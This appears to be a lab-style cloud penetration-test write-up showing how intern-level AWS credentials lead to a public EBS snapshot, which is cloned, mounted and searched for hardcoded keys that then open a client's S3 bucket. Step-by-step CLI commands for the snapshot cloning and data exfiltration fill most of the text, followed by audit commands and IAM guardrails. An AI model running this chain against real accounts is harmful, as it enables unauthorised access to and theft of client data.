Scenario
Huge Logistics hired me to simulate an “assume breach” scenario starting with intern-level AWS credentials. My challenge: uncover how far minimal access could go in their cloud environment. The stakes? Their client E-Corp’s disaster recovery plans and backup logistics hung in the balance.
Phase 1: Initial Reconnaissance
First, I established my identity using AWS CLI:
aws sts get-caller-identity
Output:
IAM User: intern
Account ID: 1045064**608
This confirmed my starting position: minimal privileges.

Next, I investigated attached policies:
aws iam list-attached-user-policies --user-name intern
Discovered policy: PublicSnapper
Examined the policy document (get-policy returns only metadata; the actual statements come from the default policy version):
aws iam get-policy --policy-arn arn:aws:iam::104506445608:policy/PublicSnapper
aws iam get-policy-version \
    --policy-arn arn:aws:iam::104506445608:policy/PublicSnapper \
    --version-id <DefaultVersionId from get-policy>

Key permissions granted:
- ec2:DescribeSnapshots (view all account snapshots)
- ec2:DescribeSnapshotAttribute (inspect snapshot permissions)
This was excessive for an intern – my first red flag.
Phase 2: Snapshot Discovery
Enumerated EBS snapshots:
aws ec2 describe-snapshots --owner-ids 104506445608 --region us-east-1

Discovered:
- Snapshot ID: snap-0c0679098c7a4e636
- Size: 50 GB
- Unencrypted
Checked permissions:
aws ec2 describe-snapshot-attribute \
    --attribute createVolumePermission \
    --snapshot-id snap-0c0679098c7a4e636
Critical finding:
{
    "CreateVolumePermissions": [
        { "Group": "all" }
    ]
}

"Group": "all" meant ANY AWS account could clone this snapshot – a catastrophic misconfiguration.
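This condition is easy to test mechanically as well. A minimal sketch that greps the CLI's JSON output for the public-access marker; the sample response below is the one captured above:

```shell
# Sample `describe-snapshot-attribute` response (as captured above)
RESPONSE='{
    "CreateVolumePermissions": [
        { "Group": "all" }
    ]
}'

# A snapshot is world-clonable when any createVolumePermission carries Group=all
if printf '%s' "$RESPONSE" | grep -q '"Group": *"all"'; then
    echo "snap-0c0679098c7a4e636: PUBLIC"
else
    echo "snap-0c0679098c7a4e636: private"
fi
# prints: snap-0c0679098c7a4e636: PUBLIC
```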
Phase 3: Data Exfiltration
In my personal AWS account:
- Created a volume from the public snapshot (us-east-1a AZ)
- Launched an Ubuntu EC2 instance (t2.micro, same AZ)
- Attached the volume as /dev/xvdf
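The three steps above map to three CLI calls. A sketch, run from the attacker's own account – the volume and instance IDs are placeholders filled in from each command's output, and the AMI ID is hypothetical:

```shell
# 1. Clone the public snapshot into a volume in our own account
aws ec2 create-volume \
    --snapshot-id snap-0c0679098c7a4e636 \
    --availability-zone us-east-1a

# 2. Launch a throwaway instance in the same AZ (AMI ID is a placeholder)
aws ec2 run-instances \
    --image-id <ubuntu-ami-id> \
    --instance-type t2.micro \
    --key-name key \
    --placement AvailabilityZone=us-east-1a

# 3. Attach the cloned volume to the instance
aws ec2 attach-volume \
    --volume-id <vol-id from step 1> \
    --instance-id <instance-id from step 2> \
    --device /dev/xvdf
```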

Mounted the volume:
ssh -i key.pem ubuntu@<IP>
sudo mkdir /mnt/secret_volume
sudo mount /dev/xvdf1 /mnt/secret_volume
Discovered critical exposure:
cat /mnt/secret_volume/home/intern/practice_files/s3_download_file.php
Contained hardcoded credentials:
<?php
$aws_key = "AKIAJ...";
$aws_secret = "k7c3...";
$bucket = "ecorp-client-data";
?>
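Hardcoded keys like this are easy to sweep for mechanically, since AWS access key IDs follow a fixed shape. A minimal sketch – the directory and file below are a synthetic stand-in for the mounted volume, and the planted key is AWS's documented example value, not a real credential:

```shell
# Build a stand-in for the mounted snapshot with one planted test file
# (AKIAIOSFODNN7EXAMPLE is AWS's documentation example key, not a live secret)
MOUNT=$(mktemp -d)
mkdir -p "$MOUNT/home/intern/practice_files"
printf '<?php $aws_key = "AKIAIOSFODNN7EXAMPLE"; ?>\n' \
    > "$MOUNT/home/intern/practice_files/s3_download_file.php"

# Access key IDs are "AKIA" followed by 16 uppercase alphanumerics;
# -r recurses, -E enables the regex, -l prints only matching file names
HITS=$(grep -rEl 'AKIA[A-Z0-9]{16}' "$MOUNT")
echo "$HITS"
```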

Phase 4: Full Compromise
Used stolen credentials:
aws configure set aws_access_key_id "AKIAJ..."
aws configure set aws_secret_access_key "k7c3..."
Accessed sensitive S3 bucket:
aws s3 ls s3://ecorp-client-data
Discovered files:
- ecorp_dr_logistics.csv
- client_backup_keys.txt
- financial_records.zip
Exfiltrated critical data:
aws s3 cp s3://ecorp-client-data/ecorp_dr_logistics.csv .

Huge Logistics had exposed their largest client through a single public snapshot.
Defense Analysis & Lessons Learned
Why this breach occurred:
- Public snapshot permissions: "Group": "all" enabled cross-account access
- Unencrypted data: no EBS encryption enabled
- Hardcoded secrets: credentials in test files
- Overprivileged intern: excessive DescribeSnapshots permission
Mitigation strategies:
# Weekly audit for public snapshots. Note: describe-snapshots output does not
# include CreateVolumePermissions, so filter by restorable-by instead:
aws ec2 describe-snapshots \
    --owner-ids self \
    --restorable-by-user-ids all \
    --query "Snapshots[].SnapshotId" \
    --output table
Critical defenses implemented:
- Encrypt all EBS volumes with KMS keys
- Automate public snapshot detection with AWS Config rules
- Implement IAM policy guardrails:
{
    "Effect": "Deny",
    "Action": "ec2:ModifySnapshotAttribute",
    "Resource": "*",
    "Condition": {
        "StringEquals": {
            "ec2:Attribute": "createVolumePermission"
        }
    }
}
- Rotate credentials quarterly and after incidents
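Two of these defenses can be switched on directly from the CLI. A sketch – the Config rule name is ours, and the managed-rule identifier should be verified against AWS's current managed-rule catalog:

```shell
# Account-level EBS encryption by default (must be enabled per region)
aws ec2 enable-ebs-encryption-by-default --region us-east-1

# Managed AWS Config rule that flags publicly restorable EBS snapshots
# (rule name is arbitrary; identifier per AWS's managed-rule catalog)
aws configservice put-config-rule --config-rule '{
    "ConfigRuleName": "ebs-snapshot-public-check",
    "Source": {
        "Owner": "AWS",
        "SourceIdentifier": "EBS_SNAPSHOT_PUBLIC_RESTORABLE_CHECK"
    }
}'
```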
Conclusion
This breach demonstrated how third-party vulnerabilities (Huge Logistics) can compromise primary targets (E-Corp). Within 37 minutes, I progressed from intern credentials to full client data exfiltration by exploiting:
- A single public snapshot (snap-0c0679098c7a4e636)
- Hardcoded credentials in the mounted volume
- Excessive IAM permissions
The exercise revealed three additional public snapshots in other regions – proving the problem was systemic, not isolated. As Ben Morris showed at DEF CON 27, these exposures affect Fortune 500 companies across the tech, healthcare, and logistics sectors.
“Cloud security isn’t about guarding front doors – it’s about checking every window, drawer, and hidden key under the mat. One public snapshot is all it takes to unravel an ecosystem.”